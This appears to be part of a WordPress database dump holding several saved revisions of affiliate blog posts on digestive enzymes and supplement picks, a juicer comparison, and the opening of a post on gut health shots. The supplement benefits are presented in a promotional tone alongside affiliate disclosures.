Enzymes are protein molecules with a unique structure that enables them to accelerate chemical reactions without being consumed or altered in the process. Think of them as nature\'s microscopic workers, facilitating reactions that would otherwise be too slow to sustain life. Enzymes work by binding to specific molecules, known as substrates, and then transforming them into products through a series of precisely orchestrated steps.

\n\n\n\n

Enzymes in Digestion

\n\n\n\n

One of the most well-known roles of enzymes is in the digestive system. Digestive enzymes help break down complex nutrients into smaller, more absorbable forms that the body can use. For example, amylase enzymes break down carbohydrates into sugars, protease enzymes break down proteins into amino acids, and lipase enzymes break down fats into fatty acids and glycerol. This breakdown process is crucial for nutrient absorption and energy production.

\n\n\n\n

Enzymes and Cellular Processes

\n\n\n\n

Enzymes are not limited to digestion; they are involved in virtually every cellular process within our bodies. From DNA replication and repair to the synthesis of new molecules, enzymes regulate and accelerate these processes to ensure our cells function optimally. Without enzymes, essential cellular functions would be sluggish or non-existent.

\n\n\n\n

Health Benefits of Enzymes

\n\n\n\n

Enzymes also offer several health benefits beyond digestion and cellular processes:

\n\n\n\n
    \n
  1. Digestive Health: Enzyme supplements can aid individuals with digestive disorders, such as lactose intolerance or gluten sensitivity, by assisting in the breakdown of specific compounds that might otherwise cause discomfort.
  2. \n\n\n\n
  3. Inflammation Reduction: Some enzymes possess anti-inflammatory properties, helping to modulate the body\'s immune response and reduce inflammation associated with various health conditions.
  4. \n\n\n\n
  5. Nutrient Absorption: By aiding in the breakdown of nutrients, enzymes enhance nutrient absorption, which can lead to improved overall health and energy levels.
  6. \n\n\n\n
  7. Gut Health: Certain enzymes, such as proteolytic enzymes, are believed to promote a healthy gut environment by breaking down harmful proteins and supporting the growth of beneficial bacteria.
  8. \n\n\n\n
  9. Metabolism Boost: Enzymes play a role in metabolism, and their proper function can contribute to a balanced metabolic rate.
  10. \n
\n\n\n\n

Conclusion

\n\n\n\n

Enzymes are the unsung heroes of life, driving essential biochemical reactions that sustain us from the cellular level to the systems that keep us alive and well. Without these molecular catalysts, life as we know it would be impossible. From aiding in digestion to supporting overall health, enzymes are a testament to the intricate design of our bodies and the power of nature\'s biochemical processes. So, the next time you enjoy a meal or marvel at the marvels of life, remember the remarkable work of enzymes that make it all possible.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you chose to make a purchase using my links

\n
\n\n\n\n

Here are our top 10 enzyme supplement recommendations

\n\n\n\n

Biocare Polyzyme Forte - High potency broad spectrum digestive enzymes

\n\n\n\n\"\"\n\n\n\n

Enzymedica Digest Gold + ATPro, Maximum Strength Enzyme Formula, Prevents Bloating and Gas, 14 Key Enzymes Including Amylase, Protease, Lipase and Lactase, 120 Capsules

\n\n\n\n\"\"\n\n\n

\n

\n

','Unlocking the Power of Enzymes: Nature\'s Catalysts for Vital Processes','','inherit','closed','closed','','5446-revision-v1','','','2023-09-19 17:59:02','2023-09-19 17:59:02','',5446,'https://tummyrevolution.com/?p=5639',0,'revision','',0),(5641,1,'2023-09-19 18:02:01','2023-09-19 18:02:01','\n
\n

Enzymes might sound like complex chemical compounds, but they are actually tiny molecular machines that play a pivotal role in our bodies and the natural world. Often referred to as the \"catalysts of life,\" enzymes are essential for a multitude of biochemical processes that keep our bodies functioning smoothly. In this article, we\'ll delve into the fascinating world of enzymes, understanding what they are and why they are so crucial for our well-being.

\n\n\n\n

What Are Enzymes?

\n\n\n\n

Enzymes are protein molecules with a unique structure that enables them to accelerate chemical reactions without being consumed or altered in the process. Think of them as nature\'s microscopic workers, facilitating reactions that would otherwise be too slow to sustain life. Enzymes work by binding to specific molecules, known as substrates, and then transforming them into products through a series of precisely orchestrated steps.

\n\n\n\n

Enzymes in Digestion

\n\n\n\n

One of the most well-known roles of enzymes is in the digestive system. Digestive enzymes help break down complex nutrients into smaller, more absorbable forms that the body can use. For example, amylase enzymes break down carbohydrates into sugars, protease enzymes break down proteins into amino acids, and lipase enzymes break down fats into fatty acids and glycerol. This breakdown process is crucial for nutrient absorption and energy production.

\n\n\n\n

Enzymes and Cellular Processes

\n\n\n\n

Enzymes are not limited to digestion; they are involved in virtually every cellular process within our bodies. From DNA replication and repair to the synthesis of new molecules, enzymes regulate and accelerate these processes to ensure our cells function optimally. Without enzymes, essential cellular functions would be sluggish or non-existent.

\n\n\n\n

Health Benefits of Enzymes

\n\n\n\n

Enzymes also offer several health benefits beyond digestion and cellular processes:

\n\n\n\n
    \n
  1. Digestive Health: Enzyme supplements can aid individuals with digestive disorders, such as lactose intolerance or gluten sensitivity, by assisting in the breakdown of specific compounds that might otherwise cause discomfort.
  2. \n\n\n\n
  3. Inflammation Reduction: Some enzymes possess anti-inflammatory properties, helping to modulate the body\'s immune response and reduce inflammation associated with various health conditions.
  4. \n\n\n\n
  5. Nutrient Absorption: By aiding in the breakdown of nutrients, enzymes enhance nutrient absorption, which can lead to improved overall health and energy levels.
  6. \n\n\n\n
  7. Gut Health: Certain enzymes, such as proteolytic enzymes, are believed to promote a healthy gut environment by breaking down harmful proteins and supporting the growth of beneficial bacteria.
  8. \n\n\n\n
  9. Metabolism Boost: Enzymes play a role in metabolism, and their proper function can contribute to a balanced metabolic rate.
  10. \n
\n\n\n\n

Conclusion

\n\n\n\n

Enzymes are the unsung heroes of life, driving essential biochemical reactions that sustain us from the cellular level to the systems that keep us alive and well. Without these molecular catalysts, life as we know it would be impossible. From aiding in digestion to supporting overall health, enzymes are a testament to the intricate design of our bodies and the power of nature\'s biochemical processes. So, the next time you enjoy a meal or marvel at the marvels of life, remember the remarkable work of enzymes that make it all possible.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you chose to make a purchase using my links

\n
\n\n\n\n

Here are our top 10 enzyme supplement recommendations

\n\n\n\n

Biocare Polyzyme Forte - High potency broad spectrum digestive enzymes

\n\n\n\n\"\"\n\n\n\n

Enzymedica Digest Gold + ATPro, Maximum Strength Enzyme Formula, Prevents Bloating and Gas, 14 Key Enzymes Including Amylase, Protease, Lipase and Lactase, 120 Capsules

\n\n\n\n\"\"\n\n\n

','Unlocking the Power of Enzymes: Nature\'s Catalysts for Vital Processes','','inherit','closed','closed','','5446-revision-v1','','','2023-09-19 18:02:01','2023-09-19 18:02:01','',5446,'https://tummyrevolution.com/?p=5641',0,'revision','',0),(5642,1,'2023-09-20 04:15:24','2023-09-20 04:15:24','\n
\n

Enzymes might sound like complex chemical compounds, but they are actually tiny molecular machines that play a pivotal role in our bodies and the natural world. Often referred to as the \"catalysts of life,\" enzymes are essential for a multitude of biochemical processes that keep our bodies functioning smoothly. In this article, we\'ll delve into the fascinating world of enzymes, understanding what they are and why they are so crucial for our well-being.

\n\n\n\n

What Are Enzymes?

\n\n\n\n

Enzymes are protein molecules with a unique structure that enables them to accelerate chemical reactions without being consumed or altered in the process. Think of them as nature\'s microscopic workers, facilitating reactions that would otherwise be too slow to sustain life. Enzymes work by binding to specific molecules, known as substrates, and then transforming them into products through a series of precisely orchestrated steps.

\n\n\n\n

Enzymes in Digestion

\n\n\n\n

One of the most well-known roles of enzymes is in the digestive system. Digestive enzymes help break down complex nutrients into smaller, more absorbable forms that the body can use. For example, amylase enzymes break down carbohydrates into sugars, protease enzymes break down proteins into amino acids, and lipase enzymes break down fats into fatty acids and glycerol. This breakdown process is crucial for nutrient absorption and energy production.

\n\n\n\n

Enzymes and Cellular Processes

\n\n\n\n

Enzymes are not limited to digestion; they are involved in virtually every cellular process within our bodies. From DNA replication and repair to the synthesis of new molecules, enzymes regulate and accelerate these processes to ensure our cells function optimally. Without enzymes, essential cellular functions would be sluggish or non-existent.

\n\n\n\n

Health Benefits of Enzymes

\n\n\n\n

Enzymes also offer several health benefits beyond digestion and cellular processes:

\n\n\n\n
    \n
  1. Digestive Health: Enzyme supplements can aid individuals with digestive disorders, such as lactose intolerance or gluten sensitivity, by assisting in the breakdown of specific compounds that might otherwise cause discomfort.
  2. \n\n\n\n
  3. Inflammation Reduction: Some enzymes possess anti-inflammatory properties, helping to modulate the body\'s immune response and reduce inflammation associated with various health conditions.
  4. \n\n\n\n
  5. Nutrient Absorption: By aiding in the breakdown of nutrients, enzymes enhance nutrient absorption, which can lead to improved overall health and energy levels.
  6. \n\n\n\n
  7. Gut Health: Certain enzymes, such as proteolytic enzymes, are believed to promote a healthy gut environment by breaking down harmful proteins and supporting the growth of beneficial bacteria.
  8. \n\n\n\n
  9. Metabolism Boost: Enzymes play a role in metabolism, and their proper function can contribute to a balanced metabolic rate.
  10. \n
\n\n\n\n

Conclusion

\n\n\n\n

Enzymes are the unsung heroes of life, driving essential biochemical reactions that sustain us from the cellular level to the systems that keep us alive and well. Without these molecular catalysts, life as we know it would be impossible. From aiding in digestion to supporting overall health, enzymes are a testament to the intricate design of our bodies and the power of nature\'s biochemical processes. So, the next time you enjoy a meal or marvel at the marvels of life, remember the remarkable work of enzymes that make it all possible.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you chose to make a purchase using my links

\n
\n\n\n\n

Here are our top 10 enzyme supplement recommendations

\n\n\n\n

Biocare Polyzyme Forte - High potency broad spectrum digestive enzymes

\n\n\n\n\"\"\n\n\n\n

Zenwise Digestive Enzymes - Probiotic Multi Enzyme with Probiotics and Prebiotics for Digestive Health and Bloating Relief for Women and Men, Enzymes for Digestion and Gut Health - 180 Count

\n\n\n\n\"\"\n\n\n\n


Enzymedica Digest Gold + ATPro, Maximum Strength Enzyme Formula, Prevents Bloating and Gas, 14 Key Enzymes Including Amylase, Protease, Lipase and Lactase, 120 Capsules

\n\n\n\n\"\"\n\n\n

 

\n

','Unlocking the Power of Enzymes: Nature\'s Catalysts for Vital Processes','','inherit','closed','closed','','5446-revision-v1','','','2023-09-20 04:15:24','2023-09-20 04:15:24','',5446,'https://tummyrevolution.com/?p=5642',0,'revision','',0),(5643,1,'2023-09-20 10:05:37','2023-09-20 10:05:37','\n
\n

Enzymes might sound like complex chemical compounds, but they are actually tiny molecular machines that play a pivotal role in our bodies and the natural world. Often referred to as the \"catalysts of life,\" enzymes are essential for a multitude of biochemical processes that keep our bodies functioning smoothly. In this article, we\'ll delve into the fascinating world of enzymes, understanding what they are and why they are so crucial for our well-being.

\n\n\n\n

What Are Enzymes?

\n\n\n\n

Enzymes are protein molecules with a unique structure that enables them to accelerate chemical reactions without being consumed or altered in the process. Think of them as nature\'s microscopic workers, facilitating reactions that would otherwise be too slow to sustain life. Enzymes work by binding to specific molecules, known as substrates, and then transforming them into products through a series of precisely orchestrated steps.

\n\n\n\n

Enzymes in Digestion

\n\n\n\n

One of the most well-known roles of enzymes is in the digestive system. Digestive enzymes help break down complex nutrients into smaller, more absorbable forms that the body can use. For example, amylase enzymes break down carbohydrates into sugars, protease enzymes break down proteins into amino acids, and lipase enzymes break down fats into fatty acids and glycerol. This breakdown process is crucial for nutrient absorption and energy production.

\n\n\n\n

Enzymes and Cellular Processes

\n\n\n\n

Enzymes are not limited to digestion; they are involved in virtually every cellular process within our bodies. From DNA replication and repair to the synthesis of new molecules, enzymes regulate and accelerate these processes to ensure our cells function optimally. Without enzymes, essential cellular functions would be sluggish or non-existent.

\n\n\n\n

Health Benefits of Enzymes

\n\n\n\n

Enzymes also offer several health benefits beyond digestion and cellular processes:

\n\n\n\n
    \n
  1. Digestive Health: Enzyme supplements can aid individuals with digestive disorders, such as lactose intolerance or gluten sensitivity, by assisting in the breakdown of specific compounds that might otherwise cause discomfort.
  2. \n\n\n\n
  3. Inflammation Reduction: Some enzymes possess anti-inflammatory properties, helping to modulate the body\'s immune response and reduce inflammation associated with various health conditions.
  4. \n\n\n\n
  5. Nutrient Absorption: By aiding in the breakdown of nutrients, enzymes enhance nutrient absorption, which can lead to improved overall health and energy levels.
  6. \n\n\n\n
  7. Gut Health: Certain enzymes, such as proteolytic enzymes, are believed to promote a healthy gut environment by breaking down harmful proteins and supporting the growth of beneficial bacteria.
  8. \n\n\n\n
  9. Metabolism Boost: Enzymes play a role in metabolism, and their proper function can contribute to a balanced metabolic rate.
  10. \n
\n\n\n\n

Conclusion

\n\n\n\n

Enzymes are the unsung heroes of life, driving essential biochemical reactions that sustain us from the cellular level to the systems that keep us alive and well. Without these molecular catalysts, life as we know it would be impossible. From aiding in digestion to supporting overall health, enzymes are a testament to the intricate design of our bodies and the power of nature\'s biochemical processes. So, the next time you enjoy a meal or marvel at the marvels of life, remember the remarkable work of enzymes that make it all possible.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you chose to make a purchase using my links

\n
\n\n\n\n

Here are our top 10 enzyme supplement recommendations

\n\n\n\n

Biocare Polyzyme Forte - High potency broad spectrum digestive enzymes

\n\n\n\n\"\"\n\n\n\n

Zenwise Digestive Enzymes - Probiotic Multi Enzyme with Probiotics and Prebiotics for Digestive Health and Bloating Relief for Women and Men, Enzymes for Digestion and Gut Health - 180 Count

\n\n\n\n\"\"\n\n\n\n

NOW Supplements - Super Enzymes, Formulated with Bromelain, Ox Bile, Pancreatin and Papain,180 Capsules

\n\n\n\n\"\"\n\n\n\n


Enzymedica Digest Gold + ATPro, Maximum Strength Enzyme Formula, Prevents Bloating and Gas, 14 Key Enzymes Including Amylase, Protease, Lipase and Lactase, 120 Capsules

\n\n\n\n\"\"\n\n\n

 

\n

','Unlocking the Power of Enzymes: Nature\'s Catalysts for Vital Processes','','inherit','closed','closed','','5446-revision-v1','','','2023-09-20 10:05:37','2023-09-20 10:05:37','',5446,'https://tummyrevolution.com/?p=5643',0,'revision','',0),(5644,1,'2023-09-20 10:25:56','2023-09-20 10:25:56','\n
\n

Enzymes might sound like complex chemical compounds, but they are actually tiny molecular machines that play a pivotal role in our bodies and the natural world. Often referred to as the \"catalysts of life,\" enzymes are essential for a multitude of biochemical processes that keep our bodies functioning smoothly. In this article, we\'ll delve into the fascinating world of enzymes, understanding what they are and why they are so crucial for our well-being.

\n\n\n\n

What Are Enzymes?

\n\n\n\n

Enzymes are protein molecules with a unique structure that enables them to accelerate chemical reactions without being consumed or altered in the process. Think of them as nature\'s microscopic workers, facilitating reactions that would otherwise be too slow to sustain life. Enzymes work by binding to specific molecules, known as substrates, and then transforming them into products through a series of precisely orchestrated steps.

\n\n\n\n

Enzymes in Digestion

\n\n\n\n

One of the most well-known roles of enzymes is in the digestive system. Digestive enzymes help break down complex nutrients into smaller, more absorbable forms that the body can use. For example, amylase enzymes break down carbohydrates into sugars, protease enzymes break down proteins into amino acids, and lipase enzymes break down fats into fatty acids and glycerol. This breakdown process is crucial for nutrient absorption and energy production.

\n\n\n\n

Enzymes and Cellular Processes

\n\n\n\n

Enzymes are not limited to digestion; they are involved in virtually every cellular process within our bodies. From DNA replication and repair to the synthesis of new molecules, enzymes regulate and accelerate these processes to ensure our cells function optimally. Without enzymes, essential cellular functions would be sluggish or non-existent.

\n\n\n\n

Health Benefits of Enzymes

\n\n\n\n

Enzymes also offer several health benefits beyond digestion and cellular processes:

\n\n\n\n
    \n
  1. Digestive Health: Enzyme supplements can aid individuals with digestive disorders, such as lactose intolerance or gluten sensitivity, by assisting in the breakdown of specific compounds that might otherwise cause discomfort.
  2. \n\n\n\n
  3. Inflammation Reduction: Some enzymes possess anti-inflammatory properties, helping to modulate the body\'s immune response and reduce inflammation associated with various health conditions.
  4. \n\n\n\n
  5. Nutrient Absorption: By aiding in the breakdown of nutrients, enzymes enhance nutrient absorption, which can lead to improved overall health and energy levels.
  6. \n\n\n\n
  7. Gut Health: Certain enzymes, such as proteolytic enzymes, are believed to promote a healthy gut environment by breaking down harmful proteins and supporting the growth of beneficial bacteria.
  8. \n\n\n\n
  9. Metabolism Boost: Enzymes play a role in metabolism, and their proper function can contribute to a balanced metabolic rate.
  10. \n
\n\n\n\n

Conclusion

\n\n\n\n

Enzymes are the unsung heroes of life, driving essential biochemical reactions that sustain us from the cellular level to the systems that keep us alive and well. Without these molecular catalysts, life as we know it would be impossible. From aiding in digestion to supporting overall health, enzymes are a testament to the intricate design of our bodies and the power of nature\'s biochemical processes. So, the next time you enjoy a meal or marvel at the marvels of life, remember the remarkable work of enzymes that make it all possible.

\n\n\n\n

This post contains affiliate links. This means I may earn commission should you chose to make a purchase using my links

\n
\n\n\n\n

Here are our top 5 enzyme supplement recommendations

\n\n\n\n

Biocare Polyzyme Forte - High potency broad spectrum digestive enzymes

\n\n\n\n\"\"\n\n\n\n

Zenwise Digestive Enzymes - Probiotic Multi Enzyme with Probiotics and Prebiotics for Digestive Health and Bloating Relief for Women and Men, Enzymes for Digestion and Gut Health - 180 Count

\n\n\n\n\"\"\n\n\n\n

Pure Encapsulations Digestive Enzymes Ultra - Vegetarian Digestive Enzyme Supplement to Support Protein, Carb, Fiber, and Dairy Digestion* - 90 Capsules

\n\n\n\n\"\"\n\n\n\n

NOW Supplements - Super Enzymes, Formulated with Bromelain, Ox Bile, Pancreatin and Papain,180 Capsules

\n\n\n\n\"\"\n\n\n\n


Enzymedica Digest Gold + ATPro, Maximum Strength Enzyme Formula, Prevents Bloating and Gas, 14 Key Enzymes Including Amylase, Protease, Lipase and Lactase, 120 Capsules

\n\n\n\n\"\"\n\n\n

 

\n

','Unlocking the Power of Enzymes: Nature\'s Catalysts for Vital Processes','','inherit','closed','closed','','5446-revision-v1','','','2023-09-20 10:25:56','2023-09-20 10:25:56','',5446,'https://tummyrevolution.com/?p=5644',0,'revision','',0),(5650,1,'2023-10-07 06:07:40','2023-10-07 06:07:40','\n

Juicing has gained popularity as a convenient way to nourish your body with a burst of vitamins and minerals from fruits and vegetables. However, with a variety of juicer options available on the market, it can be overwhelming to decide which one suits your needs best. In this article, we\'ll compare some of the top juicer models, highlighting their features and benefits to help you make an informed decision.

\n\n\n\n

1. Centrifugal Juicers:

\n\n\n\n

Centrifugal juicers are known for their speed and efficiency in extracting juice from fruits and vegetables. They work by using sharp blades to chop the produce and then centrifugal force to separate the juice from the pulp. These juicers are great for busy individuals who want quick and easy juicing.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Fast juicing process.
  • \n\n\n\n
  • Generally more affordable.
  • \n\n\n\n
  • Suitable for hard fruits and vegetables.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • Can produce heat that might degrade enzymes and nutrients.
  • \n\n\n\n
  • Less efficient at extracting juice from leafy greens.
  • \n\n\n\n
  • Juice might have more pulp.
  • \n
\n\n\n\n

Recommended Model: Breville JE98XL Juice Fountain Plus

\n\n\n\n\"\"\n\n\n\n

2. Masticating Juicers (Slow Juicers):

\n\n\n\n

Masticating juicers use a slow, grinding process to extract juice from produce. They gently crush and squeeze fruits and vegetables, preserving more nutrients and enzymes. These juicers are ideal for those who prioritize nutrient retention and want to juice a variety of ingredients, including leafy greens.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Higher nutrient retention due to slower juicing process.
  • \n\n\n\n
  • Effective at juicing leafy greens and wheatgrass.
  • \n\n\n\n
  • Less oxidation, resulting in longer shelf life for juices.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • Slower juicing process.
  • \n\n\n\n
  • Generally more expensive.
  • \n\n\n\n
  • Smaller feed chute might require more prep time.
  • \n
\n\n\n\n

Recommended Model: Omega NC900HDC Nutrition Center Juicer

\n\n\n\n\"\"\n\n\n\n

3. Twin Gear Juicers:

\n\n\n\n

Twin gear juicers use two interlocking gears to crush and press fruits and vegetables, extracting juice efficiently. These juicers are often used by serious juicing enthusiasts who want the highest nutrient yield from a wide variety of produce.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Maximum nutrient extraction due to dual gears.
  • \n\n\n\n
  • Effective at juicing leafy greens, wheatgrass, and herbs.
  • \n\n\n\n
  • Minimal oxidation for longer-lasting juices.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • More complex setup and cleaning process.
  • \n\n\n\n
  • Typically more expensive.
  • \n
\n\n\n\n

Recommended Model: Green Star Elite GSE-5000

\n\n\n\n\"\"\n\n\n\n

4. Citrus Juicers:

\n\n\n\n

As the name suggests, citrus juicers are designed specifically for citrus fruits like oranges, lemons, and grapefruits. They come in manual and electric versions and are perfect for individuals who primarily juice citrus fruits.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Designed for specific fruits.
  • \n\n\n\n
  • Easy to use and clean.
  • \n\n\n\n
  • Electric models can be quick and efficient.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • Limited to citrus fruits.
  • \n\n\n\n
  • Manual models require physical effort.
  • \n
\n\n\n\n

Recommended Model: Cuisinart CCJ-500 Pulp Control Citrus Juicer

\n\n\n\n\"\"\n\n\n\n

Conclusion

\n\n\n\n

The best juicer for you depends on your preferences, budget, and the types of produce you plan to juice. Centrifugal juicers offer speed and convenience, masticating juicers prioritize nutrient retention, twin gear juicers provide maximum yield, and citrus juicers are specialized for specific fruits. Before making a decision, consider factors like juicing speed, ease of cleaning, versatility, and the types of fruits and vegetables you want to juice. Whichever model you choose, the key is to enjoy the benefits of fresh, nutrient-rich juices as part of your healthy lifestyle.

\n','Title: Choosing the Best Juicer: A Comparison of Top Models','','inherit','closed','closed','','5537-revision-v1','','','2023-10-07 06:07:40','2023-10-07 06:07:40','',5537,'https://tummyrevolution.com/?p=5650',0,'revision','',0),(5651,1,'2023-10-07 06:09:35','2023-10-07 06:09:35','\n

Juicing has gained popularity as a convenient way to nourish your body with a burst of vitamins and minerals from fruits and vegetables. However, with a variety of juicer options available on the market, it can be overwhelming to decide which one suits your needs best. In this article, we\'ll compare some of the top juicer models, highlighting their features and benefits to help you make an informed decision.

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you chose to make a purchase using my link.

\n\n\n\n

1. Centrifugal Juicers:

\n\n\n\n

Centrifugal juicers are known for their speed and efficiency in extracting juice from fruits and vegetables. They work by using sharp blades to chop the produce and then centrifugal force to separate the juice from the pulp. These juicers are great for busy individuals who want quick and easy juicing.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Fast juicing process.
  • \n\n\n\n
  • Generally more affordable.
  • \n\n\n\n
  • Suitable for hard fruits and vegetables.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • Can produce heat that might degrade enzymes and nutrients.
  • \n\n\n\n
  • Less efficient at extracting juice from leafy greens.
  • \n\n\n\n
  • Juice might have more pulp.
  • \n
\n\n\n\n

Recommended Model: Breville JE98XL Juice Fountain Plus

\n\n\n\n\"\"\n\n\n\n

2. Masticating Juicers (Slow Juicers):

\n\n\n\n

Masticating juicers use a slow, grinding process to extract juice from produce. They gently crush and squeeze fruits and vegetables, preserving more nutrients and enzymes. These juicers are ideal for those who prioritize nutrient retention and want to juice a variety of ingredients, including leafy greens.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Higher nutrient retention due to slower juicing process.
  • \n\n\n\n
  • Effective at juicing leafy greens and wheatgrass.
  • \n\n\n\n
  • Less oxidation, resulting in longer shelf life for juices.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • Slower juicing process.
  • \n\n\n\n
  • Generally more expensive.
  • \n\n\n\n
  • Smaller feed chute might require more prep time.
  • \n
\n\n\n\n

Recommended Model: Omega NC900HDC Nutrition Center Juicer

\n\n\n\n\"\"\n\n\n\n

3. Twin Gear Juicers:

\n\n\n\n

Twin gear juicers use two interlocking gears to crush and press fruits and vegetables, extracting juice efficiently. These juicers are often used by serious juicing enthusiasts who want the highest nutrient yield from a wide variety of produce.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Maximum nutrient extraction due to dual gears.
  • \n\n\n\n
  • Effective at juicing leafy greens, wheatgrass, and herbs.
  • \n\n\n\n
  • Minimal oxidation for longer-lasting juices.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • More complex setup and cleaning process.
  • \n\n\n\n
  • Typically more expensive.
  • \n
\n\n\n\n

Recommended Model: Green Star Elite GSE-5000

\n\n\n\n\"\"\n\n\n\n

4. Citrus Juicers:

\n\n\n\n

As the name suggests, citrus juicers are designed specifically for citrus fruits like oranges, lemons, and grapefruits. They come in manual and electric versions and are perfect for individuals who primarily juice citrus fruits.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Designed for specific fruits.
  • \n\n\n\n
  • Easy to use and clean.
  • \n\n\n\n
  • Electric models can be quick and efficient.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • Limited to citrus fruits.
  • \n\n\n\n
  • Manual models require physical effort.
  • \n
\n\n\n\n

Recommended Model: Cuisinart CCJ-500 Pulp Control Citrus Juicer

\n\n\n\n\"\"\n\n\n\n

Conclusion

\n\n\n\n

The best juicer for you depends on your preferences, budget, and the types of produce you plan to juice. Centrifugal juicers offer speed and convenience, masticating juicers prioritize nutrient retention, twin gear juicers provide maximum yield, and citrus juicers are specialized for specific fruits. Before making a decision, consider factors like juicing speed, ease of cleaning, versatility, and the types of fruits and vegetables you want to juice. Whichever model you choose, the key is to enjoy the benefits of fresh, nutrient-rich juices as part of your healthy lifestyle.

\n','Title: Choosing the Best Juicer: A Comparison of Top Models','','inherit','closed','closed','','5537-revision-v1','','','2023-10-07 06:09:35','2023-10-07 06:09:35','',5537,'https://tummyrevolution.com/?p=5651',0,'revision','',0),(5652,1,'2023-10-07 06:10:01','2023-10-07 06:10:01','\n

Juicing has gained popularity as a convenient way to nourish your body with a burst of vitamins and minerals from fruits and vegetables. However, with a variety of juicer options available on the market, it can be overwhelming to decide which one suits your needs best. In this article, we\'ll compare some of the top juicer models, highlighting their features and benefits to help you make an informed decision.

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you chose to make a purchase using my link.

\n\n\n\n

1. Centrifugal Juicers:

\n\n\n\n

Centrifugal juicers are known for their speed and efficiency in extracting juice from fruits and vegetables. They work by using sharp blades to chop the produce and then centrifugal force to separate the juice from the pulp. These juicers are great for busy individuals who want quick and easy juicing.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Fast juicing process.
  • \n\n\n\n
  • Generally more affordable.
  • \n\n\n\n
  • Suitable for hard fruits and vegetables.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • Can produce heat that might degrade enzymes and nutrients.
  • \n\n\n\n
  • Less efficient at extracting juice from leafy greens.
  • \n\n\n\n
  • Juice might have more pulp.
  • \n
\n\n\n\n

Recommended Model: Breville JE98XL Juice Fountain Plus

\n\n\n\n\"\"\n\n\n\n

2. Masticating Juicers (Slow Juicers):

\n\n\n\n

Masticating juicers use a slow, grinding process to extract juice from produce. They gently crush and squeeze fruits and vegetables, preserving more nutrients and enzymes. These juicers are ideal for those who prioritize nutrient retention and want to juice a variety of ingredients, including leafy greens.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Higher nutrient retention due to slower juicing process.
  • \n\n\n\n
  • Effective at juicing leafy greens and wheatgrass.
  • \n\n\n\n
  • Less oxidation, resulting in longer shelf life for juices.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • Slower juicing process.
  • \n\n\n\n
  • Generally more expensive.
  • \n\n\n\n
  • Smaller feed chute might require more prep time.
  • \n
\n\n\n\n

Recommended Model: Omega NC900HDC Nutrition Center Juicer

\n\n\n\n\"\"\n\n\n\n

3. Twin Gear Juicers:

\n\n\n\n

Twin gear juicers use two interlocking gears to crush and press fruits and vegetables, extracting juice efficiently. These juicers are often used by serious juicing enthusiasts who want the highest nutrient yield from a wide variety of produce.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Maximum nutrient extraction due to dual gears.
  • \n\n\n\n
  • Effective at juicing leafy greens, wheatgrass, and herbs.
  • \n\n\n\n
  • Minimal oxidation for longer-lasting juices.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • More complex setup and cleaning process.
  • \n\n\n\n
  • Typically more expensive.
  • \n
\n\n\n\n

Recommended Model: Green Star Elite GSE-5000

\n\n\n\n\"\"\n\n\n\n

4. Citrus Juicers:

\n\n\n\n

As the name suggests, citrus juicers are designed specifically for citrus fruits like oranges, lemons, and grapefruits. They come in manual and electric versions and are perfect for individuals who primarily juice citrus fruits.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Designed for specific fruits.
  • \n\n\n\n
  • Easy to use and clean.
  • \n\n\n\n
  • Electric models can be quick and efficient.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • Limited to citrus fruits.
  • \n\n\n\n
  • Manual models require physical effort.
  • \n
\n\n\n\n

Recommended Model: Cuisinart CCJ-500 Pulp Control Citrus Juicer

\n\n\n\n\"\"\n\n\n\n

Conclusion

\n\n\n\n

The best juicer for you depends on your preferences, budget, and the types of produce you plan to juice. Centrifugal juicers offer speed and convenience, masticating juicers prioritize nutrient retention, twin gear juicers provide maximum yield, and citrus juicers are specialized for specific fruits. Before making a decision, consider factors like juicing speed, ease of cleaning, versatility, and the types of fruits and vegetables you want to juice. Whichever model you choose, the key is to enjoy the benefits of fresh, nutrient-rich juices as part of your healthy lifestyle.

\n','Title: Choosing the Best Juicer 2023: A Comparison of Top Models','','inherit','closed','closed','','5537-revision-v1','','','2023-10-07 06:10:01','2023-10-07 06:10:01','',5537,'https://tummyrevolution.com/?p=5652',0,'revision','',0),(5653,1,'2023-10-07 06:46:20','2023-10-07 06:46:20','\n

Gut health shots have gained popularity in recent years for their potential to support digestive wellness and overall health. But, like any health trend, they come with both benefits and drawbacks. In this blog post, we\'ll explore the pros and cons of incorporating gut health shots into your routine.

\n\n\n\n

Pros:

\n\n\n\n

1. Digestive Health Support: Gut health shots often contain probiotics and prebiotics that can help maintain a balanced gut microbiome. This can lead to improved digestion, reduced bloating, and enhanced nutrient absorption.

\n\n\n\n

2. Immune System Boost: A significant portion of the immune system resides in the gut. By promoting a diverse and healthy gut microbiome, these shots may strengthen your immune defenses.

\n\n\n\n

3. Convenience: Gut health shots are usually small, convenient, and easy to incorporate into your daily routine. They can be consumed on the go, making them a practical choice for busy individuals.

\n\n\n\n

